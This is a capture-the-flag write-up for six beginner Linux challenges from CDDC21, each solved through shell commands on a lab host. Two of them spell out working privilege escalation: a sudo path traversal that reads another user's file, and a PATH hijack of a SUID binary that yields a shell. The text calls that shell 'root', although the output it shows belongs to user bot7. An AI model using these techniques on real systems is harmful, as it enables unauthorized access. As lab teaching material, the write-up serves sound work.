Linux Rules the World! (Linux)
Lock and Key
We are given a private RSA key file. We can use ssh-keygen -p to change the passphrase.
root@no:~/Downloads# chmod 600 cybot01_bot1.key
root@no:~/Downloads# ssh-keygen -p -f cybot01_bot1.key
Key has comment 'bot1@ip-172-31-34-218'
Enter new passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved with the new passphrase.root@no:~/Downloads# ssh -i cybot01_bot1.key [email protected]Once in, the flag is in the home directory.
CDDC21{b0t_eNtR3nC3}
License to Run
The challenge description hinted at some malicious file that can be run. I looked for all the files that were executable by bot2, and found an interesting file in the home directory.
bot2@cybot01:/$ find / -executable -type f 2>/dev/null | grep flag
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/mount_flags.sh
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/move_mount_flags.sh
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/mmap_flags.sh
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/rename_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/mount_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/move_mount_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/mmap_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/rename_flags.sh
/home/bot2/.#flag$!!1Running this file gives us the flag.
bot2@cybot01:~$ ./.#flag\$\!\!1
CDDC21{TH4nKsF0R_p3RM}Historian
In the .viminfo file, a secret file location is revealed. The /usr/local/share/secret file contains the flag.
bot3@cybot01:~$ ls -la
total 24
dr-xr-x--- 2 root bot3 4096 Jun 18 09:51 .
drwxr-xr-x 10 root bot5 4096 Jun 18 09:51 ..
lrwxrwxrwx 1 root root 9 Jun 18 09:51 .bash_history -> /dev/null
-r--r----- 1 bot3 bot3 220 Feb 25 2020 .bash_logout
-r--r----- 1 bot3 bot3 3771 Feb 25 2020 .bashrc
-r--r----- 1 bot3 bot3 807 Feb 25 2020 .profile
-rwx------ 1 bot3 root 794 Jun 23 10:34 .viminfo
bot3@cybot01:~$ cat .viminfo
...
# File marks:
'0 1 15 /usr/local/share/secret
4,48,1,15,1620820231,"/usr/local/share/secret'
...
bot3@cybot01:~$ cat /usr/local/share/secret
CDDC21{V1m_th3_s4vior}Line Inspection
There is a random-secrets file with lots of gibberish. Grepping the CDDC substring gives us the flag.
bot4@cybot01:~$ cat random-secrets | grep CDDC
CDDC21{gRe3EpL1nG}Super
We are allowed to run /usr/bin/cat /var/log/* as bot6 with no password.
bot5@cybot01:~$ sudo -l
Matching Defaults entries for bot5 on cybot01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bot5 may run the following commands on cybot01:
(bot6 : bot6) NOPASSWD: /usr/bin/cat /var/log/*We can use path traversal to get the flag:
bot5@cybot01:~$ sudo -u bot6 cat /var/log/../../../home/bot5/flag.txt
CDDC21{b3w4r3sud03rz}Path to Win
There is a systeminfo binary in the home directory.
bot6@cybot01:~$ ls -la
total 44
dr-xr-x--- 2 root bot6 4096 Jun 18 09:51 .
drwxr-xr-x 10 root bot5 4096 Jun 18 09:51 ..
lrwxrwxrwx 1 root root 9 Jun 18 09:51 .bash_history -> /dev/null
-r--r----- 1 bot6 bot6 220 Feb 25 2020 .bash_logout
-r--r----- 1 bot6 bot6 3771 Feb 25 2020 .bashrc
-r--r----- 1 bot6 bot6 807 Feb 25 2020 .profile
-r-------- 1 bot7 root 31 Jun 18 09:51 flag.txt
-r-sr-xr-x 1 bot7 root 17008 Jun 18 09:51 systeminfoRunning it gives the following output.
bot6@cybot01:~$ ./systeminfo
System information...
[*] Date:
Wed Jun 23 15:06:18 UTC 2021
[*] Kernel:
5.8.0-1035-aws
[*] User infomation:
uid=1007(bot7) gid=1006(bot6) groups=1006(bot6),1005(bot5)We can deduce that the systeminfo binary calls id. Note that since systeminfo has SUID permissions, it runs as bot7. If the id call does not use an absolute path, then we can perform PATH variable manipulation to force the execution of our custom payload.
This time, running systeminfo gives us a shell as root.
bot6@cybot01:~$ cd /tmp
bot6@cybot01:/tmp$ echo /bin/sh > id
bot6@cybot01:/tmp$ chmod 777 id
bot6@cybot01:/tmp$ export PATH=/tmp:$PATH
bot6@cybot01:/tmp$ /home/bot6/systeminfo
System information...
[*] Date:
Wed Jun 23 15:07:48 UTC 2021
[*] Kernel:
5.8.0-1035-aws
[*] User infomation:
$ pwd
/tmp
$ cd /home/bot6
$ cat flag.txt
CDDC21{SU!d_!s_Qu!Te_DngeRouS}Last updated
Was this helpful?